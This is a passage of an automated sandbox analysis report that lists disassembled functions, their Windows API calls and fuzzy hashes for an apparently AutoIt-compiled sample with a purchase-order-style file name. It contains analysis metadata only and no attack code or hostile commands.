Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6

Function 00437AFE Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00437B15
_wcslen.LIBCMT ref: 00437B1D

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

_wcscpy.LIBCMT ref: 00437B46
_wcscat.LIBCMT ref: 00437B4D

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: _wcslen$_malloc_wcscat_wcscpy
String ID:
API String ID: 1597257046-0
Opcode ID: 89f1a50a5f3f04ab4eb1e3bf6fc47514f3819a61a53c7cc8dd854e7388be254d
Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
Opcode Fuzzy Hash: 89f1a50a5f3f04ab4eb1e3bf6fc47514f3819a61a53c7cc8dd854e7388be254d
Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764

Function 004555D6 Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 0045564E
DeleteObject.GDI32(?), ref: 0045565C
DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
DestroyWindow.USER32(?,?,?,?,?), ref: 00455678

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: DeleteDestroyObject$IconWindow
String ID:
API String ID: 3349847261-0
Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D

Function 0044B600 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 0044B60B
InterlockedExchange.KERNEL32(?,?), ref: 0044B619
LeaveCriticalSection.KERNEL32(?), ref: 0044B630
LeaveCriticalSection.KERNEL32(?), ref: 0044B641

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CriticalSection$Leave$EnterExchangeInterlocked
String ID:
API String ID: 2223660684-0
Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
Instruction Fuzzy Hash: 35F08C362422019F82249B59EA488DBB3FDEBE97213009C2FE142C32108BB5F806CB75

Function 00447268 Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC

MoveToEx.GDI32(?,?,00000000,00000000), ref: 0044728F
LineTo.GDI32(?,00000000,00000002), ref: 004472A0
EndPath.GDI32(?), ref: 004472B0
StrokePath.GDI32(?), ref: 004472BE

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
String ID:
API String ID: 2783949968-0
Opcode ID: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
Instruction ID: 15f667079dd022c0076d5117e5ffb33549464faf874781034dcdd6a9c0a79bb3
Opcode Fuzzy Hash: 09270453bc364e96d12f6c3f9be453f1264e71f62e0889bc66601f12e66ee767
Instruction Fuzzy Hash: 46F09030109361BFE211DB10DC0AF9F3B98AB46310F10490CF641622D2C7B46845C7BA

Function 00417D0E Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00417D1A

Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82

__getptd.LIBCMT ref: 00417D31
__amsg_exit.LIBCMT ref: 00417D3F
__lock.LIBCMT ref: 00417D4F

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
Instruction ID: 784cd6646040312d8c3929352b57c791f513dbd9ce30c249d09a92555f0e5bc7
Opcode Fuzzy Hash: 6e88b35b2b81098ca19d257f076875e832caf49443e3c23eeee739354b537ff9
Instruction Fuzzy Hash: D4F06D319447089AD720FB66E4067EA32B0AF01728F11856FA4415B7D2DB3C99C08B9E

Function 00471144 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00471144
GetDC.USER32(00000000), ref: 0047114D
GetDeviceCaps.GDI32(00000000,00000074), ref: 0047115A
ReleaseDC.USER32(00000000,?), ref: 0047117B

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
Instruction ID: a1da8b046b56c0024f4e51319ca7c868ce9b42ab557c4db2e47d6af70bf9fcef
Opcode Fuzzy Hash: 949280357db84fa49407f8095e759b2e277f1c53a9819964645a6bf04a6d26c7
Instruction Fuzzy Hash: 75F05E759042009FC310DF65DC4856EBBA4FB94351F108C3EFD05D2251DB7889059B99

Function 00471102 Relevance: 6.0, APIs: 4, Instructions: 28COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00471102
GetDC.USER32(00000000), ref: 0047110B
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00471118
ReleaseDC.USER32(00000000,?), ref: 00471139

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
Instruction ID: 5204c471e266b2ed5cdb435334cd6f206910ee07043e0bb223494c3f632f6575
Opcode Fuzzy Hash: 179ddf2500a9669b2282ba4880ad99879b6dd87bde84ab61e923a9eee80713d7
Instruction Fuzzy Hash: 78F05E759042009FD310EF65DC5896EBBA4FB94351F104C3EFC05D2251DB7489059B99

Function 004389A1 Relevance: 6.0, APIs: 4, Instructions: 27threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
GetCurrentThreadId.KERNEL32 ref: 004389DA
AttachThreadInput.USER32(00000000), ref: 004389E1

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
Instruction ID: 438da6915ae72ab6a15f098678a9856147cbf2dc0a85cf0a700465948addd5b0
Opcode Fuzzy Hash: fc668e8f88677791c9032932ff1b39d21009c78d2dca35edbf1b20bb29ea35ff
Instruction Fuzzy Hash: 14E012712853107BE72157509D0EFAF7B98AF18B11F14481EB241B50D0DAF8A941876E

Function 004390C2 Relevance: 6.0, APIs: 4, Instructions: 26synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 004390CD
UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 004390DB
CloseHandle.KERNEL32(?,?,000000FF), ref: 004390EB
CloseHandle.KERNEL32(?,?,000000FF), ref: 004390F0

Part of subcall function 00438FB6: GetProcessHeap.KERNEL32(00000000,?,00439504,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FC1
Part of subcall function 00438FB6: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00438FC8

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
Instruction ID: e19b07cb6d87eea3d85dfea562759309df1919ba68b29a0146d7a5ec0ea3c710
Opcode Fuzzy Hash: 7cdfdd2e005e28f5438e9d3b399fcd684928161159dd652c77b09849c549b5d2
Instruction Fuzzy Hash: 5DE0C976504311ABC620EB65DC48C4BB7E9EF883303114E1DF89693260CA74E881CB65

Function 0041405D Relevance: 6.0, APIs: 4, Instructions: 19threadCOMMON

Download Yara Rule

APIs

__IsNonwritableInCurrentImage.LIBCMT ref: 00414070

Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B

__getptd_noexit.LIBCMT ref: 00414080
__freeptd.LIBCMT ref: 0041408A
ExitThread.KERNEL32 ref: 00414093

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CurrentExitFindImageNonwritableSectionThread__freeptd__getptd_noexit
String ID:
API String ID: 3182216644-0
Opcode ID: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
Instruction ID: 8c1b811a677bc0208766d104aadce1409d27245c16b3af4a320e27a455eae914
Opcode Fuzzy Hash: 18f79961a183a005566c851b5a75566c8a37b9a59448809cc1b4ea10e33ea091
Instruction Fuzzy Hash: F8D0EC7051024256D6207BA7ED097AA3A589B44B26B15446EA905801B1DF68D9C1862D

Function 0046EDC6 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 383COMMON

Download Yara Rule

Strings

, xrefs: 0046F188
8'I, xrefs: 0046F031, 0046F039

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: BuffCharLower
String ID: $8'I
API String ID: 2358735015-3608026889
Opcode ID: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
Instruction ID: 1bf34105e022c250dd7240f1ea7ec4803edb57b208c13e69c3fb06210d7c4844
Opcode Fuzzy Hash: d6f66c2f2361e76d4402681cdd51d930a97151c2fdd89a539067bc835b5788b1
Instruction Fuzzy Hash: 9FE1AE745043018BCB24EF16D88166BB7E4BF94348F40482FF88597292EB79DD89CB9B

Function 00478373 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(00000000,00000001), ref: 0047857A

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

Part of subcall function 00445513: OleSetContainedObject.OLE32(?,00000000), ref: 00445593

Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287

Strings

Container, xrefs: 004784E0
AutoIt3GUI, xrefs: 004784DB

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: CopyVariant$ContainedObject$ErrorLast_malloc
String ID: AutoIt3GUI$Container
API String ID: 3380330463-3941886329
Opcode ID: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
Instruction ID: 8a51a4197b359b89da059ec4b883cd23719ad159cb4f439b8c2c8f5fea4c1b32
Opcode Fuzzy Hash: 167728f1ef0b290fa0ab537cd1f49c444f99f24bf3b7fe0b60cc3227d219d98d
Instruction Fuzzy Hash: FEA16A71240601AFC760EF69C880A6BB7E9FB88304F10892EF649CB361EB75E945CB55

Function 004099A8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00409A61

Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734

Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779

CharUpperBuffW.USER32(?,?), ref: 00409AF5

Strings

0vH, xrefs: 00409BD9

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
String ID: 0vH
API String ID: 1143807570-3662162768
Opcode ID: 3b8ec82d58c38576b00ff22988a0e650aa58911ac6743af60d2de49a63bf73c2
Instruction ID: 5e67718e4417cbef977f4cc7974cb0b4b39b480e5382bb1977b3cac956c07efc
Opcode Fuzzy Hash: 3b8ec82d58c38576b00ff22988a0e650aa58911ac6743af60d2de49a63bf73c2
Instruction Fuzzy Hash: 53515BB1A083009FC718CF18C48065BB7E1FF88314F54856EF9999B391D779E942CB96

Function 00466587 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON

Download Yara Rule

Strings

HH, xrefs: 004665C5
HH, xrefs: 00466678

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID: HH$HH
API String ID: 0-1787419579
Opcode ID: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
Instruction ID: b2aab3850ea6996be17d3b26b1a0d96f4757dd5de2ef7d298d9c2790e2b3b10f
Opcode Fuzzy Hash: 7546cf6663fec2d41e0be28018c51c43d88dc93244b488606bcda1ed75612bc1
Instruction Fuzzy Hash: 1241BF367042009FC310EF69E881F5AF3A1EF99314F548A6EFA589B381D776E811CB95

Function 00444652 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004446D4
GetMenuItemInfoW.USER32 ref: 00444711

Strings

0, xrefs: 004446CC

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: b197b12ebb791d0d124b954fc3f56ec3733aa4353655cd8c64cc0c5a1933b8ad
Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
Opcode Fuzzy Hash: b197b12ebb791d0d124b954fc3f56ec3733aa4353655cd8c64cc0c5a1933b8ad
Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A

Function 00448358 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E

Strings

', xrefs: 004483C2

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A

Function 00444571 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

0, xrefs: 00444600

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1721407334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721625524.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721641749.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721673439.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA

Function 0045126C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313

Strings

Combobox, xrefs: 004512D1

Memory Dump Source

Source File: 00000000.00000002.1721473108.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

